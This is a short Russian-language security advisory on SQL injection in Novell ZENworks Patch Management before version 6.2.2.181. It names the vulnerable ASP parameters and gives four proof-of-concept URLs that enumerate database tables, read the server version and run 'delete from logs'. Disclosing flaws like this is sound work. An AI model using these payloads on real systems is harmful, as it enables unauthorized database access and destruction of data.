Программа: Novell ZENworks Patch Management версии до 6.2.2.181 

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует при обработке входных данных в параметре "Direction" сценария "computers/default.asp" и в параметрах "SearchText", "StatusFilter" и "computerFilter" в сценарии "reports/default.asp". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://192.168.1.10/computers/default.asp?sort=& Direction=;select+*+from+testclient.master.dbo.sysobjects 

http://192.168.1.10/computers/default.asp?sort=& Direction=;select+*+from+OPENQUERY+(+[testclient],+"
select+@@version;+delete+from+logs")Server 'testclient' is not configured for DATA ACCESS. [2]

http://192.168.1.10/computers/default.asp?sort=& Direction=;SELECT+name+FROM+sysobjects+WHERE+xtype+=+"U"

http://192.168.1.10/computers/default.asp?sort=& Direction=;select+*+from+OPENQUERY+(+[testclient],
+"select+@@version;+delete+from+logs") Server 'testclient' is not configured for DATA ACCESS.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии